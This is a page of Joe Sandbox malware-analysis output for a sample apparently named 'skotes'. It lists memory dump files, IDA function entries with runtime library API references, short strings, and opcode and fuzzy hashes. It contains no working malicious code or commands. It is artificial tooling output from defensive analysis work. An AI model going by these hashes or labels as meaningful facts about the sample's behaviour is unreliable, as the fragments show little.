Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 7508702b337ab969c6590127fd2fafe911626255f2fd8f5798ca8ecfb8570e48
Instruction ID: d5c402bd19617442db253326e825c470d249229bcec99b7fb150ec4f877a8494
Opcode Fuzzy Hash: 7508702b337ab969c6590127fd2fafe911626255f2fd8f5798ca8ecfb8570e48
Instruction Fuzzy Hash: D2C1E171904304ABDB20DFA5C945BEBBBF4AF04314F00456FE81697782EB79A984CB65

Function 004244DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00424538
ListArray.LIBCONCRT ref: 0042456C
Hash.LIBCMT ref: 004245D5
Hash.LIBCMT ref: 004245E5

Part of subcall function 00429C41: std::bad_exception::bad_exception.LIBCMT ref: 00429C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0042474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004247A4

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: 9d78c3736b59ffbf2bd14df4c590f2c8cce9784f63151ae9ee8cad798151f60f
Instruction ID: 9918c5579213730d12048ac580bb08f206a86f12412622a2eb33cbe94abb443a
Opcode Fuzzy Hash: 9d78c3736b59ffbf2bd14df4c590f2c8cce9784f63151ae9ee8cad798151f60f
Instruction Fuzzy Hash: 73817EB0B11B22BAD708DF758841BD9FAA8BF49704F50421FE52897281CBB8A564CBD5

Function 0043CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043CC66

Strings

vC, xrefs: 0043CBE1

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vC
API String ID: 3213747228-1921080006
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68

Function 004467A9 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 245COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00446902
__alloca_probe_16.LIBCMT ref: 00446998
__freea.LIBCMT ref: 00446A03
__freea.LIBCMT ref: 00446A0F

Strings

ejD, xrefs: 00446949, 0044681A

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: ejD
API String ID: 1635606685-1610536573
Opcode ID: 6020f71ef83837b0414de0bd54546e290defddb69459aa1348002c8d00fa6d50
Instruction ID: 8b43b916679b840abb313912331789ad073eb89bfac44f88487db5e27c46fc89
Opcode Fuzzy Hash: 6020f71ef83837b0414de0bd54546e290defddb69459aa1348002c8d00fa6d50
Instruction Fuzzy Hash: 6781C272D006459BEF20AF658841AEF7BB5DF0B354F1A405BE904B7341D739CC458BAA

Function 00431B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C2A

Strings

pContext, xrefs: 00431C22
switchState, xrefs: 00431B5E

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: e76d596c2a6809c79cd5f34f046e2284dfce15d2429b44b2e32620d4b4985629
Instruction ID: b863e61c3d732dd5109429b6f29941dee9b5abb7f1e972ae7809c7e47913e2a3
Opcode Fuzzy Hash: e76d596c2a6809c79cd5f34f046e2284dfce15d2429b44b2e32620d4b4985629
Instruction Fuzzy Hash: 8331D835A00204ABCF05EF64C881AAEB775FF4C314F20556BED1197362EB79EE05CA98

Function 0043727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 004372BE

Strings

.bat, xrefs: 004372ED
.cmd, xrefs: 004372DC
.com, xrefs: 004372FE
.exe, xrefs: 004372CB

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
